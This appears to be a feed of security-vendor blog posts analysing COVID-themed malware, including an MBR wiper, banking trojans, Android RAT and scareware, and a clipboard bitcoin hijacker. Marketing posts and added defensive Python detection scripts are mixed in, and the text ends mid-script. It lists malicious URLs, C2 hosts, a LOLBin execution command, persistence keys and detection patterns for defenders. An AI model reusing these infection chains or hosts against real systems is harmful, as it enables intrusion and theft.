CoronaVirus Trojan overwriting the MBR

SonicWall Capture Labs Threat Research team recently found a new malware that exploits the COVID-19 pandemic theme and renders disks unbootable by overwriting the Master Boot Record (MBR).

Infection cycle

Upon execution, a number of helper files are dropped inside a temporary folder:

One of the helper files, named “coronavirus.bat” and identifying itself as “coronovirus Installer”, performs most of the setup work. It creates a folder named “COVID-19” into which all the previously dropped helper files are moved; to go unnoticed, the “COVID-19” folder is hidden. It then disables Windows Task Manager and User Account Control (UAC), changes the user’s wallpaper and disables the options to add or modify it afterwards, and adds registry entries for persistence.


Coronavirus.bat

The victim is notified of installation and reboot before the system is finally restarted.

run.exe creates a batch file named run.bat that ensures the registry modifications made by “coronavirus.bat” stay in place and also launches “mainWindow.exe”.

When run, MainWindow.exe displays a window with two buttons and an image of the COVID-19 virus structure.

The “Remove virus” button does nothing. Clicking the “Help” button displays the image below.

The sole purpose of the Update.VBS script is to display the message window below.

The other binary, which runs after the reboot, is responsible for overwriting the MBR. It first backs up the original MBR to sector 1 of the disk and then overwrites the MBR with the new code.

MBR overwritten with the new code

It also writes the message below to sector 2 of the disk:

MBR and new code

From then on, the bootstrap code displays the message below to the victim at every boot.
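As an added example (my code, not part of the original post), here is a Python check a responder could run over a raw image of a disk’s first sectors to look for the layout described above: the live MBR compared against a known-good copy, the backup of the original searched for in the following sectors, and any plain-text message recovered. The sector image and the baseline MBR are constructed inline; reading LBA 0 to 2 from a real disk is left out, and the assumption that the backup lands in sector 1 (the sector after the MBR) is mine.

```python
import re
import struct
from typing import Dict, List, Optional

SECTOR = 512
BOOT_SIG = b"\x55\xAA"          # MBR boot signature at offset 510


def parse_mbr(sector: bytes) -> Dict:
    """Split one 512-byte sector into boot code, partition table and signature."""
    if len(sector) != SECTOR:
        raise ValueError("an MBR is exactly one 512-byte sector")
    partitions: List[Dict] = []
    for i in range(4):
        entry = sector[446 + 16 * i: 446 + 16 * (i + 1)]
        # status(1) CHS-start(3) type(1) CHS-end(3) LBA-start(4) sector-count(4)
        status, ptype, lba_start, count = struct.unpack("<B3xB3xII", entry)
        if ptype != 0:                       # type 0x00 marks an unused slot
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": count})
    return {"boot_code": sector[:446], "partitions": partitions,
            "signature_ok": sector[510:512] == BOOT_SIG}


def longest_printable_run(data: bytes, min_len: int = 16) -> Optional[str]:
    """Return the longest run of printable ASCII in a sector, if any."""
    runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    return max(runs, key=len).decode("ascii") if runs else None


def assess_disk(image: bytes, baseline_mbr: bytes) -> Dict:
    """Compare the live MBR (LBA 0) with a known-good copy, then look through
    the following sectors for a relocated original and for a text message."""
    sectors = [image[i:i + SECTOR] for i in range(0, len(image), SECTOR)]
    live = sectors[0]
    result = {
        "mbr_modified": live != baseline_mbr,
        "boot_code_changed": live[:446] != baseline_mbr[:446],
        "partition_table_changed": live[446:510] != baseline_mbr[446:510],
        "signature_ok": live[510:512] == BOOT_SIG,
        "backup_sector": None,   # LBA where the original MBR was found
        "message": None,         # plain text written next to the new boot code
    }
    for lba, sec in enumerate(sectors[1:], start=1):
        if sec == baseline_mbr:
            result["backup_sector"] = lba
        elif result["message"] is None:
            result["message"] = longest_printable_run(sec)
    return result


# --- constructed sample data (not taken from the real sample) ---------------
def constructed_baseline_mbr() -> bytes:
    """A known-good MBR: fake boot code, one active NTFS partition, 0x55AA."""
    boot_code = b"\xEB\x3C\x90" + b"ORIGINAL-BOOTSTRAP".ljust(443, b"\x00")
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x00\x00", 0x07,
                        b"\x00\x00\x00", 2048, 1_000_000)
    return boot_code + entry + b"\x00" * 48 + BOOT_SIG


def constructed_infected_image(baseline: bytes) -> bytes:
    """Three sectors laid out as the post describes: new boot code in LBA 0,
    the original MBR copied to LBA 1, and a text message in LBA 2."""
    new_code = (b"\xFA\xEB\xFE" + b"NEW-BOOT-CODE".ljust(443, b"\x00")
                + b"\x00" * 64 + BOOT_SIG)
    message = b"(constructed sample message shown at boot)".ljust(SECTOR, b"\x00")
    return new_code + baseline + message


if __name__ == "__main__":
    base = constructed_baseline_mbr()
    verdict = assess_disk(constructed_infected_image(base), base)
    for key, value in verdict.items():
        print(f"{key:24} {value}")
```

On a live system the baseline would be the MBR captured at build time and the image the first few sectors read from the physical disk with administrative rights.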

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: KillMBR.Corn_A (Trojan)

 

Indicators Of Compromise (IOC):

  • DFBCCE38214FDDE0B8C80771CFDEC499FC086735C8E7E25293E7292FC7993B4C

 

This threat is also detected by SonicWALL Capture ATP.

Securing SaaS: Protect More, Manage Less

It’s the start of a perfect day: You wake up, have your morning coffee followed by a delicious breakfast, and enjoy a traffic-free drive to work. Then you fire up your system to begin the frustrating and time-consuming process of evaluating threat detections in your organization’s different SaaS environments.

Between just Office 365 email, OneDrive, SharePoint Online, Box and Dropbox use, there are at least three different environments to review and verify protection against the latest breach of the day.

Staying on top of the constantly evolving threat landscape, coupled with the responsibility of securing and managing different SaaS applications across the organization, is a difficult and painstaking task. Using disparate solutions with siloed protections brings additional complexity and high potential for misconfigured policies, which increase your risk. To ensure protection against the latest SaaS threats, whether they be email or file storage, technology must keep up with changing trends.

SonicWall Cloud App Security (CAS) ensures this by introducing new features and enhancements throughout the year. Our initial release brought SonicWall protection into your SaaS environment, with advanced threat protection that spans across SaaS email and SaaS file storage in a single solution. Our February 2020 release, also known as CAS 2.6.0, expands protection capabilities and efficiencies even further.

Here are some of the new features and enhancements added to CAS:

Stop sensitive data leaks in outbound email

Data loss/leak prevention (DLP) is often an overwhelming concept for many organizations. Companies in every industry sector around the globe have seen sensitive data lost in almost every conceivable way. As a primary external communication method, email is a common source of exposure.

Preventing sensitive data such as personally identifiable information (PII), patient medical data, credit card information, or financial data from being leaked outside the organization requires constant vigilance. A wide range of high-profile data loss incidents has cost organizations millions of dollars in direct and indirect costs and has resulted in tremendous damage to brands and reputations. Whether the data was leaked accidentally, leaked intentionally or stolen, the business ramifications are the same.

Preventing sensitive data from being sent externally via email should be a critical component of any email security policy. The Office 365 email and Gmail DLP Protect (Inline) policies intercept and block outbound emails containing sensitive data before they can leave the organization. Using regulatory compliance-based templates, preventing data loss through email requires just a few easy clicks.

Identify credential compromise

Deviations from a user’s “normal” pattern of behavior, referred to as anomalies, can be indicative of credential compromise or an account takeover attack. Using AI for end-user behavior analysis (EUBA), CAS identifies and alerts on these deviations across your SaaS landscape. Just as AI evolves, feature capabilities do too.

Expanded alerting

When deviations in behavior are detected, admins need to know NOW—not the next morning when (or if) they look at a dashboard. We’ve expanded alerting for anomaly detections beyond the dashboard by offering CAS admins the ability to receive email alerts. Simply checking the “Email anomaly alerts to admins” option located in Configuration > Security App Store > Anomaly Detection > Configure is all it takes to get alerts sent right to your mailbox.

Exception management

In some situations, the activity flagged as anomalous is legitimate. Employees have emergencies, job roles change, or unusual patterns of business travel may occur. Often, the IT and Security teams are the last to know. If they find out at all, it’s usually through an alert that gets triggered based on a new user behavior.

Anomaly Exceptions offer additional flexibility by providing the ability to whitelist specific activity. While available whitelisting options are specific to the type of detection (e.g., geo suspicious, or other), the ability to whitelist for a defined time period or permanently is available for all detected activity types.

Increase efficiency with enhanced workflows and refined visibility

Managing tasks and exceptions can be part of everyday life for security admins — so efficient, streamlined management with state-of-the-art, cloud-native protection spanning your SaaS email and file storage apps is critical for organizations of any size. Several key workflows have been upgraded to increase efficiencies and simplify management even more.

Create anti-phishing whitelist or blacklist rules from within a security event

The process of creating whitelist and blacklist rules from scratch can be complex and cumbersome. We’ve made the process easier by including the ability to add rules from within a specific event. When you select one of the options, the fields are auto-populated using the event details. From there, you can modify or deselect fields as needed.

Use Mail Explorer to easily identify email messages based on specific criteria

The life of the security admin is rarely dull. When you want to find a specific email(s) sent or received by a user(s), you need to be able to do it quickly and simply. Mail Explorer brings the ability to easily identify and action specific emails with a few simple clicks. Using the tool provides the flexibility to not only quickly locate emails, but also to quarantine or blacklist.

Use dashboard customization for a refined view

Each organization, and each admin, is different. Adding the ability to save dashboard customizations as a user preference allows each admin a personalized view. Whether it’s updating a Security Event widget to display data from a custom query or isolating specific event types, the additional flexibility allows you to define what is important.

Increase compliance with read-only permissions

As administrators, we face the constant dilemma of determining who needs access to manage a product vs. who needs only data/reporting access. MySonicWall Workspace streamlines managing access permissions for SonicWall products, including CAS. Providing the ability to restrict permissions to a “read-only” view allows resources access to product data without the ability to modify the security controls or policies.

Fake Coronavirus site delivers Metamorfo banking Trojan

SonicWall Capture Labs Threat Research team has come across another variant of the Metamorfo banking trojan that tries to take advantage of the global crisis caused by the COVID-19 pandemic.

This malware was first seen 2 days ago, and the domain “masry-corona” hosting it was also created recently, with “corona” in the name to attract people looking for information about the coronavirus.

Infection Cycle:

 

When the malicious URL “hxxps://masry-corona.com/TestCoAPP.zip” is visited, the ZIP archive “TestCoApp.zip” is downloaded to the victim’s device. It contains an MSI file named “CIADXV95270MBNW.msi”, which, once opened, is installed by MsiExec.exe, the built-in Windows Installer.

 

The MSI file contains 48 streams; the “!_StringData” stream holds the downloader JavaScript, obfuscated with large amounts of junk strings.

 

After extracting and de-obfuscating !_StringData, we see the JavaScript code below, which downloads the malicious payload.

 

When the JavaScript code within the MSI file is executed, it downloads a ZIP file from the URL “hxxp://la42.website/pro2/comprobante_771124.zip” using WinHttpRequest. The ZIP file contains three files and is decompressed into a folder with an 8-letter random name, “bxkwuRkn”, under “C:\ProgramData”. The three files are likewise renamed with 8-letter random strings, in this case “qhQRAMSY.exe”, “8SkHjLCy” and “tfg74JRL.dll”.

 

qhQRAMSY.exe is the legitimate AutoIt script interpreter, originally named “AutoIt3.exe”.

 

The actual malicious payload, “tfg74JRL.dll”, is a variant of Metamorfo, a malware family that has been observed targeting the customers of online financial institutions.

 

It is executed with the command “C:\programData\qhQRAMSY.exe C:\Programdata\bxkwuRkn\8SkHjLCy C:\Programdata\bxkwuRkn\tfg74JRl.dll”. AutoIt, a whitelisted process, is used to load the malicious DLL in order to evade antivirus detection.

 

A shortcut (LNK) file containing the above command is then created in the Windows Start Menu folder so that the malware persists across reboots.

 

It then modifies several registry values: “AutoComplete”, “Use FormSuggest”, “FormSuggest Passwords” and “FormSuggest PW Ask” under “HKCU\Software\Microsoft\Internet Explorer\Main”, and “AutoSuggest” under “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoComplete”. With browser autofill disabled, the victim has to type credentials in full, which lets the malware’s keylogger record them.

 

It connects to the command-and-control (C&C) server to report that the machine has been infected. The command “<|LSTU|>” below is sent to the server and functions as a heartbeat.

 

This variant also starts the Volume Shadow Copy Service (VSS) to create a shadow copy (system restore point) containing the malicious files. Volume Shadow Copy Service is a Windows technology that creates backup copies or snapshots of files or volumes, even while they are in use.

Most antivirus software does not scan volume shadow copies for malware or other security threats. That could be why this malware tries to persist through system restore points and, at the same time, evade antivirus detection.

 

A shadow copy is created through VSS once the victim’s machine is infected:

 

As we respond to the coronavirus (COVID-19) outbreak in the real world, we must also keep up our cyber hygiene.

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

GAV: 8676 Metamorfo.DN

This threat is also detected by SonicWALL Capture ATP w/RTDMI.

IOCs:

URLs:
hxxps://masry-corona.com/TestCoAPP.zip
hxxp://masry-corona.com/TestCoAPP.zip
hxxp://la42.website/pro2/comprobante_771124.zip

SHA-256:
24e3d85865e6046e747f993dfc3b732d3922e7a1f9a382198cf699a06d83a51f (Zip)
5d413bf1c985529c38399323a7c2698371319332241b4e9bf55a47b51857aca8 (MSI)
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d (exe)
5160557cac92e174b76a596592592b3e4eac3c9c65dd4d57c91a38c0d0b8f0f4 (dll)
5e07234588a7af03453c082a23f03e41418a1f42fea9c5884f19d8df16ad0fa2 (script)

Domain:
masry-corona.com
la42.website

IP Address:
192.3.157.116
134.0.10.213

Cybersecurity News & Trends – 03-27-20

This week, cybersecurity experts band together to tackle coronavirus-related cyberthreats, SonicWall traces scareware, and healthcare systems weather cyberattacks.


SonicWall Spotlight

How to Stay Cyber-Secure While Working From Home – Raconteur

  • Picking up on a recent SonicAlert about scareware, Raconteur talks to SonicWall’s Terry Greer-King about the rise in coronavirus-related malware as more and more people work from home.

Podcast #113 – Uber Knowledge

Elite Hackers Target WHO As Coronavirus Cyberattacks Spike – Information Security Buzz

  • With hackers reported to have tried to break into the World Health Organization earlier this month, SonicWall’s Terry Greer-King talks to Information Security Buzz about the ever-changing cyber threat landscape, explaining that real-time defense mechanisms are needed to deal with attacks that can also change in real-time.

Cybersecurity News

Coronavirus Hackers Face the Wrath of the Cybersecurity Community – Verdict

  • As COVID-19 continues to spread around the planet, cybersecurity professionals have started a grassroots fight against the cybercriminals taking advantage of it. A group of over 600 expert volunteers is working to map and take down the attack infrastructure, handing over to law enforcement anyone they can specifically identify.

Malware Disguised as Google Updates Pushed via Hacked News Sites – BleepingComputer

  • Hacked corporate sites and news blogs running the WordPress CMS are redirecting visitors to a fake Google-update phishing page that eventually installs malware on their computers.

Senator Sounds Alarm on Cyber Threats to Internet Connectivity During Coronavirus Crisis – The Hill

  • Senator Mark Warner, vice chairman of the Senate Intelligence Committee, is asking companies like Google to ensure that the cybersecurity of their products is of the highest possible standard, emphasizing that “it is… imperative that consumer Internet infrastructure not be used as attack vectors to consumer systems and workplace networks accessed from home.”

Hacker Selling Data of 538 Million Weibo Users – ZDNet

  • The personal details of more than 538 million users of Chinese social network Weibo have been put up for sale on the dark web. Personal details include real names, site usernames, gender, location, and some phone numbers, but not passwords.

Paris Hospitals Target of Failed Cyber-Attack, Authority Says – Bloomberg

  • The Paris hospital authority, AP-HP, was the target of a thwarted cyberattack on March 22, according to France’s cybersecurity agency.

Singapore Most Exposed, but Also Most Prepared in Cybersecurity: Deloitte – ZDNet

  • A new study by Deloitte has found that Singapore, with its high internet adoption rate, is the modern city that is both the most exposed to cyber threats and also most prepared to deal with them.

In Case You Missed It

How to Simplify Endpoint Security

As an extension of our last blog on evaluating endpoint protection solutions, I would like to talk about how SonicWall Capture Client can deliver advanced endpoint security that meets the needs of both your organization and the users with the endpoints.

Managing endpoints and securing them across various environments is a well-known challenge for SecOps professionals. If you do not have a solution that provides visibility and reduces your response time during an outage or business disruption, you’ll spend a good chunk of your day in troubleshooting and mitigating.

In this post, we will discuss how we can use SonicWall Capture Client to manage your endpoints and save time implementing the features provided by the solution.

  1. Don’t worry, it’s always on

    Most of the endpoint solutions on the market rely on cloud connectivity. Some are based on reputation or similarities to known malware. With SonicWall Capture Client, all the intelligence and AI models are baked into the low-footprint SentinelOne engine that automatically quarantines and mitigates malicious activity on the endpoint.

    This process works in tandem with the Capture Advanced Threat Protection (ATP) cloud sandbox service, which delivers off-box analysis for an instant “good-or-bad” verdict. The result? Users can continue working securely and uninterrupted without worrying about potential compromise.

  2. One-click rollback for easier remediation

    With malware and ransomware adopting smarter techniques to penetrate your security perimeter, behavioral analysis is more likely to get triggered as a defense mechanism. However, there is no 100% guarantee. If all layers are breached by the 1%, it generally hits the radar when the user reports the problem. By this time, it’s often too late. You will need to come up with a response plan and quickly remediate the threat.

    With SonicWall, you are a click away from rolling back the impact, saving a lot of time and cycles around coordinating with the user, and allowing the user to get back to completing their tasks without any further interruption.

  3. Seamless endpoint management

    The early days of endpoint security implementation used a zone-based approach. The idea behind zones is to allow SecOps to configure different policies based on location, usually because of on-premise management limitations.

    But ransomware is location-agnostic — and you need consistent security following the endpoint. By deploying the SonicWall agent (leveraging SentinelOne’s low-memory footprint) across your endpoint assets, you don’t need to worry about this. With a cloud-based management console, endpoint policies are now applied to every endpoint consistently with the ability to define granular user/device-based exceptions. Moreover, by using the cloud-based Capture ATP sandbox service, endpoints can take full advantage of protection without depending on on-premise appliances.

  4. What you see is what you defend

    Once SonicWall Capture Client is deployed across your assets, each agent automatically reports on all installed applications. Unlike other solutions, this functionality is not dependent on ever running the actual application.

    From the management console, you can see the onboarded endpoints and the applications that are on the machine, what processes are running, etc. Reports can be scheduled and emailed to recipients of your choice with executive-level insights. Further details can be leveraged from the report to implement any corrective measures that are needed to address the same.

  5. Automate & orchestrate with APIs

    With threats increasing at exponential rates, there is a big bang effect that is being observed in the threat landscape.

    Cybercriminals are getting craftier and leveraging automation techniques to evade traditional ways of getting detected. This gives them the ability to process more data in less time, jumping from database to database or network to network with relative ease. If enterprises try to eliminate threats using manual processes or ad-hoc hunts, they are at a severe disadvantage.

    SonicWall Capture Client has been built with an API-first approach, so anything the technology does in isolation can also be orchestrated and integrated, creating unified and proactive workflows with other security tools. This allows the organizations to be one step ahead of the attacks and protect environments from other threats.


Read-to-Go Security Bundle Includes Endpoint Protection

To help organizations cost-effectively build their work-from-home workforces, SonicWall is making its remote access products and services, endpoint protection and cloud application security solutions available to both new and existing customers via deeply discounted rates.

These packages were bundled to include everything needed to protect employees outside the network:

  • Free Secure Mobile Access (SMA) virtual appliance
  • Aggressive discounts on Capture Client endpoint protection
  • Aggressive discounts on Cloud App Security
  • Aggressive discounts on support contracts and Remote Implementation Services when you bundle a virtual appliance
  • New 30- and 60-day VPN spike licenses for existing SMA 100 and 1000 series customers

Fake CoronaTracker app for Android ships with malicious Banker, Spyware and RAT capabilities

SonicWall Capture Labs Threat Research team has been monitoring potentially malicious apps that use the CoronaVirus/COVID-19 theme, and we have published a number of blog posts on this topic in the past few days. We identified another Android malware using the coronavirus theme; it comes with a multitude of capabilities, including Remote Access Trojan (RAT) and spyware functionality and a banker component that targets banking apps.

The malware goes by the Turkish name “Corona Takip”, which translates to “Corona Follow”. It poses as a COVID-19 tracker app for mobile devices by copying the icon of Corona Tracker, a web application that tracks the latest developments of the coronavirus outbreak and whose source is hosted on GitHub.

 

On installation and execution, to the victim the app appears to open a mobile version of the site shown above:

But in the background the malware starts its nefarious activities.

 

Network Communication

Once executed, the malware communicates with the Command and Control (C&C) server aymyapi.com. It sends encoded information via HTTP POST to two PHP pages, a14.php and a4.php:

Within the code we observed a number of .php pages, but during our analysis we did not encounter further communication:

 

Configuration File

Upon execution, a configuration file named set.xml is saved locally in the shared_prefs folder:

 

Remote Access Trojan (RAT) functionality

This malware has RAT capabilities: it allows the attacker to issue commands and control the infected device remotely. We found the following commands present in the code:

  • downloadfile
  • deletefilefolder
  • opendir
  • startscreenVNC
  • stopscreenVNC
  • noconnection

 

Hardcoded Commands

A number of commands are present in configuration file set.xml (highlighted earlier) and can be traced back to the code:

A few of the dangerous commands present in both the code and the config file are listed below. They give the malware the capability to spy on the infected device and extract critical personally identifiable information:

  • keylogger
  • gps
  • spamSMS
  • VNC_Start_New
  • startRecordingSound
  • htmllocker

One of the commands is textPlayProtect, and its value is “The system is not working properly, please disable Google Play Protect!”. We also found code in which the malware raises alerts when the user tries to enable Play Protect and when Play Protect has been disabled:

There are additional alert messages when critical actions are performed:

 

Targeted banking apps

This malware keeps track of more than 100 apps and can display fake screens to steal credentials. The majority of the apps are banking apps; overall they fall into the following categories:

  • Shopping
  • Banking
  • Crypto
  • Stock Trading

Miscellaneous observations

We observed alert messages in multiple languages, indicating that the malware writers aspire to spread this threat to different parts of the world. We spotted the following country codes:

  • United States (US)
  • Russia (RU)
  • Turkey (TR)
  • Germany (DE)
  • Italy (IT)
  • France (FR)
  • Ukraine (UA)

 

We observed a hardcoded link to the coronatracker website; replacing it with a different site would change the theme of the malware:

 

The C&C domain contacted by the malware – aymyapi.com – was registered recently according to its Whois information:

  • Created: 2020-03-17 15:44:59 UTC
  • Expiration: 2021-03-17 15:44:59 UTC

This indicates that this version of the malware was created recently to capitalize on the rising global awareness of the coronavirus, another example of malware writers furthering their malicious creations by riding on the popularity of the pandemic.

 

Overall, this is another instance illustrating an Android malware disguised as a CoronaVirus related app. As described in our previous blogs, malware writers are misusing the panic state caused by the pandemic to further their malicious goals.

 

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • GAV: AndroidOS.CoronaTracker.BNK (Trojan)
  • GAV: AndroidOS.CoronaTracker.TU (Trojan)

Indicator of Compromise(IOC):

  • b7070a1fa932fe1cc8198e89e3a799f3

List of targets:


 

Android CoronaVirus Ransomware comes bundled with decryption code

With the sudden spike in coronavirus-related threats, it is no surprise that recent ransomware uses the same name. SonicWall Capture Labs Threat Research team observed an Android ransomware that uses scare tactics to make a quick buck.

 

Sample specifics

Application Name: Coronavirus Tracker

Package Name: com.device.security

Md5: d1d417235616e4a05096319bb4875f57

 

The permissions requested by the malware application are chosen to enable/start key functionality of the malware:

  • “Receive boot completed” has been included to enable the RebootReceiver service
  • “Request ignore battery optimizations” has been included to ensure that the malware is not hibernated into a low power state to conserve battery

Infection Cycle

This ransomware spreads by posing as a CoronaVirus Tracker:

Once installed and executed, it requests Accessibility Service and Device Admin permissions:

 

After a few minutes we are shown the ransom screen:

 

Behind the scenes

The ransom screen can be intimidating at first sight, as it threatens to leak images and videos from the device if the ransom is not paid. The ransom screen is loaded from a hardcoded URL in the code that redirects to a Pastebin page:

Although this malware presents itself as ransomware, it is in reality scareware: malware that uses scare tactics to coax the victim into paying a ransom. There is no evidence of any file encryption or of any way to steal or post images or videos from the infected device.

The malware author demands payment in exchange for a decryption code. However, inspecting the code revealed this decryption code stored in clear text:

On entering this code, 4865083501, we saw the message “Congrats. You Phone is Decrypted”.

 

Success Rate

We checked the Bitcoin wallet address mentioned in the ransom note and confirmed that there is currently no significant traffic to this wallet. This indicates that the malware authors have not yet had significant success with this ransomware:

A note of caution

For anyone whose device is infected by this ransomware, the decryption code is 4865083501. After the code is entered, the app disappears from the app drawer, which gives the user the impression that it is no longer on the device. In reality the app keeps running in the background and can still be seen in the list of downloaded apps on the device:

Uninstalling the app is not straightforward because of the Device Admin privilege: the Uninstall button appears greyed out. The only way to remove the app is to first revoke the admin rights given to it via Security -> Device Administration -> untick Coronavirus Tracker.

 

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • GAV: AndroidOS.Decrypt.RSM (Trojan)
  • GAV: AndroidOS.CoronaTracker.RSM (Trojan)

 

Indicators Of Compromise (IOC):

  • d1d417235616e4a05096319bb4875f57

Found another Remote Access Trojan pretending to be Documentation on Covid19 Response and Preparedness

As the coronavirus pandemic unfolds, the SonicWall Capture Labs Research team also observes an increasing amount of malicious software actively exploiting this crisis. As we have previously reported, we have seen different malware families using this tactic, from ransomware to infostealers to phishing scams, all trying to deceive people who are constantly searching for news and updates from around the world.

This week, we have seen a malware family pretending to be information about the virus and targeting administrators of institutions of higher education.

Infection Cycle

The Trojan arrives in an archive possibly distributed via spam. Within that archive is a file with the following filename and icon:

  • Interim Guidance for Administrators of US Institutions of Higher Education to Plan, Prepare and Respond to CoViD19.exe

The CDC (Centers for Disease Control and Prevention) has published official guidance under exactly this title on its website.

Upon execution it creates a copy of itself in the following directory:

  • %Appdata%\Roaming\shost.exe

To ensure persistence it adds the following to the registry:

  • HKCU/Software\Microsoft\Windows\CurrentVersion\Run  shost   %Appdata%\Roaming\shost.exe

It then makes a DNS query to peacelist [dot] ignorelist[dot]com:

It then makes periodic connections to a remote server using ports 5505, 7707 and 8808.

At the time of analysis no data had been exchanged in either direction, but this does demonstrate the sample's ability to phone home and possibly receive further instructions from the remote server.
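The periodic connections described above are what a beaconing check looks for. The following is an added example, not code from the original post or from SonicWall: it groups constructed outbound-connection records by process image and destination host, measures how regular the intervals are, and reports sessions that are also on the reported ports or run from a user-writable directory. The record format, the full image path and all timestamps are constructed for the example; only the host name, the ports and the file name shost.exe come from the post.

```python
"""Beaconing check over constructed outbound-connection records.

Constructed sample input (not from the original post): one record per outbound
TCP connection in the form  timestamp | image path | destination host | port,
as an EDR or firewall export might look on an infected workstation.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

SAMPLE_CONNECTIONS = """\
2020-03-20T10:00:00 | C:\\Users\\victim\\AppData\\Roaming\\shost.exe | peacelist.ignorelist.com | 5505
2020-03-20T10:00:05 | C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe | www.cdc.gov | 443
2020-03-20T10:00:07 | C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe | www.cdc.gov | 443
2020-03-20T10:00:30 | C:\\Users\\victim\\AppData\\Roaming\\shost.exe | peacelist.ignorelist.com | 7707
2020-03-20T10:01:00 | C:\\Users\\victim\\AppData\\Roaming\\shost.exe | peacelist.ignorelist.com | 8808
2020-03-20T10:01:30 | C:\\Users\\victim\\AppData\\Roaming\\shost.exe | peacelist.ignorelist.com | 5505
2020-03-20T10:01:40 | C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe | www.cdc.gov | 443
2020-03-20T10:02:00 | C:\\Users\\victim\\AppData\\Roaming\\shost.exe | peacelist.ignorelist.com | 7707
2020-03-20T10:02:30 | C:\\Users\\victim\\AppData\\Roaming\\shost.exe | peacelist.ignorelist.com | 8808
2020-03-20T10:03:10 | C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe | www.cdc.gov | 443
"""

BEACON_PORTS = {5505, 7707, 8808}                     # ports reported in the post
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\")


def parse_connections(text):
    """Parse the pipe-delimited records into (timestamp, image, host, port) tuples."""
    records = []
    for line in text.strip().splitlines():
        ts, image, host, port = (field.strip() for field in line.split("|"))
        records.append((datetime.fromisoformat(ts), image, host, int(port)))
    return records


def find_beacons(records, min_connections=4, max_jitter=0.2):
    """Group connections by (image, host) and flag regular-interval sessions.

    Grouping by host rather than port matters here: the sample rotates through
    three ports, so a per-port view would split one beacon into three sparse ones.
    """
    by_peer = defaultdict(list)
    for ts, image, host, port in records:
        by_peer[(image, host)].append((ts, port))

    findings = []
    for (image, host), conns in by_peer.items():
        if len(conns) < min_connections:
            continue
        conns.sort()
        gaps = [(later[0] - earlier[0]).total_seconds()
                for earlier, later in zip(conns, conns[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        jitter = pstdev(gaps) / avg                   # coefficient of variation of the gaps
        ports = {port for _, port in conns}
        reasons = []
        if jitter <= max_jitter:
            reasons.append(f"regular interval of ~{avg:.0f}s (jitter {jitter:.2f})")
        if ports & BEACON_PORTS:
            reasons.append(f"uses reported C2 ports {sorted(ports & BEACON_PORTS)}")
        if any(marker in image.lower() for marker in USER_WRITABLE):
            reasons.append("image runs from a user-writable directory")
        if reasons:
            findings.append({"image": image, "host": host,
                             "connections": len(conns), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_beacons(parse_connections(SAMPLE_CONNECTIONS)):
        print(f"{finding['host']} <- {finding['image']} ({finding['connections']} connections)")
        for reason in finding["reasons"]:
            print("   -", reason)
```

The browser traffic in the sample has the same number of connections as the beacon but irregular gaps, no match on the reported ports and a Program Files image, so it produces no finding; in practice the interval check alone will also catch legitimate pollers such as update agents, which is why the other two signals are reported alongside it.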

During this crisis, we urge our users to only use official and reputable websites as their source of information and news. Always be vigilant and cautious when installing software programs particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Async.RAT (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Caution: Beware while copy & pasting Bitcoin address for financial transactions

Sometimes even simple-looking code can cause a lot of damage. The SonicWall Threats Research team found a new technique used by malware authors that silently redirects financial transactions made by a victim to the malware author's account. The SonicWall RTDMI ™ engine has recently detected a malware sample which examines the clipboard content for a bitcoin address pattern. If it finds a bitcoin address, it replaces it in the clipboard with the malware author's bitcoin address.

Because bitcoin addresses are long and alphanumeric, users usually prefer to copy and paste them rather than type them. On a compromised machine the malware therefore acts as a man in the middle, switching the clipboard content between the copy and the paste.

The malware's infection chain begins with a VBScript file delivered inside an archive as an email attachment. Execution passes through three layers of VBScript before the final payload, a PowerShell script, is run.

First Layer VBScript:

The malware uses Living Off The Land (LOTL) tactics to stay under the radar while executing on the victim's machine. The VBScript uses mshta.exe to execute a second-layer VBScript hosted remotely at the Pastebin Uniform Resource Locator (URL) “http:\\pastebin.com\raw\Mf2k0MGb”. mshta.exe is considered one of the Living Off The Land Binaries (LOLBins), which are used to bypass application whitelisting defenses:

Second Layer VBScript:

The second-layer VBScript again uses mshta.exe to execute a third-layer VBScript hosted remotely at the Pastebin URL “http:\\pastebin.com\raw\x3cbyh8u”. The malware also creates persistence entries on the victim's machine:

Persistence:

The malware schedules a task to run every hour, which executes the third-layer VBScript from the Pastebin URL “http:\\pastebin.com\raw\x3cbyh8u” using mshta.exe:

The malware also adds registry entries under “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” to ensure it executes at system start:
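Both the Run-key entry noted for the remote access Trojan earlier on this page and the mshta/scheduled-task chain in this post leave traces that an endpoint audit can catch. The following added example (not code from the original posts or from SonicWall) runs three checks over constructed Sysmon-style events: a LOLBin launched with a remote URL on its command line, a schtasks /create that hands a LOLBin to the scheduler, and a Run value that points into a user-writable directory or at a LOLBin. The event layout is a simplification of Sysmon's process-creation (event id 1) and registry-set (event id 13) events, and the Pastebin paste IDs are placeholders rather than the ones in the post.

```python
"""Persistence and LOLBin audit over constructed Sysmon-style events.

Constructed sample events (not from the original posts): event id 1 is process
creation (image + command line), event id 13 is a registry value set (target key
+ data). The paste IDs are placeholders, not the ones seen in the post.
"""
import re

# Matches http:// and https://, and tolerates the http:\\ spelling seen in the post.
REMOTE_URL = re.compile(r"https?:[\\/]{2}", re.IGNORECASE)
LOLBINS = ("mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe")
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
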